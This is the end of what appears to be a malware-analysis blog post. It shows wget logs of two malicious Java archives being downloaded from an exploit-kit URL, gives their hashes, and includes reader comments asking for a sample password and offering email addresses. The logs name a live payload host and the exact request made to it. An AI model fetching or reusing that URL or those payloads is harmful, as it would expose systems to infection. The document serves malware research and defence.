Length: 16,786 (16K) [application/java-archive]
"16:24:21 (26.42 KB/s) - `try1.jar' saved [16786/16786]"

// retry - try2 (newer java version)

--17:06:01--  http://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
           => "column.php@cabimab=lij&ymwbck=rpe"
Resolving dekamerionka.ru... seconds 0.00, 91.224.135.20, 212.112.207.15, 81.31.47.124
Caching dekamerionka.ru => 91.224.135.20 212.112.207.15 81.31.47.124
Connecting to dekamerionka.ru|91.224.135.20|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5b20 (new refcount 1).
  :
GET /forum/links/column.php?cabimab=lij&ymwbck=rpe HTTP/1.0
User-Agent: MalwareMustDie!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 08:11:06 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 22600
ETag: "2af29d21c006b5c106bd7760f19a2bf5"
Last-Modified: Wed, 16 Jan 2013 08:05:58 GMT
Accept-Ranges: bytes
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 22,600 (22K) [application/java-archive]
"17:06:03 (42.76 KB/s) - `try2.jar' saved [22600/22600]"

// two jars was downloaded successfully

bash-2.02$ date
Tue Jan 15 23:14:51  2013

2013/01/16  16:24            16,786 tri1.jar
2013/01/16  17:05            22,600 try2.jar
               2 File(s)         39,386 bytes

tri1.jar    e3ffc7e6bc6f654d51dd5bb7658ae853
try2.jar    2af29d21c006b5c106bd7760f19a2bf5
 :
#MalwareMustDie!

10 comments:

  1. Hi. What is the password for the archive?

    ReplyDelete
  2. we will send the password by email

    ReplyDelete
    Replies
    1. Hi. What is the password the archive? please email fahmifisal@gmail.com

      Delete
  3. Hi, what is password

    sav1980 @ hotmail.it

    ReplyDelete
  4. Hi, what is password

    yeoungpc@gmail.com

    thanks~

    ReplyDelete
  5. hi and thanks for the great works. Do you have any script to convert and analyze the shell code ? thanks

    tecko92@gmail.com

    ReplyDelete
  6. Hi guys and thanks for the great analysis.Do you have any scripts to deobfuscate the payload ?

    ReplyDelete
  7. We discipline our self for not using tools for these analysis.
    Do not get us wrong, we do not against any tools, we help to improve tools for automatic deobfuscation by publishing our manual posts.

    You can use many great online obfuscation tools for these scripts like jsunpack or wepawet.Please try also to deobfuscate manually too since the encoded data are changing rapidly.

    Rgds

    ReplyDelete
  8. Hi, can you send password

    millky8202@gmail.com

    thanks~

    ReplyDelete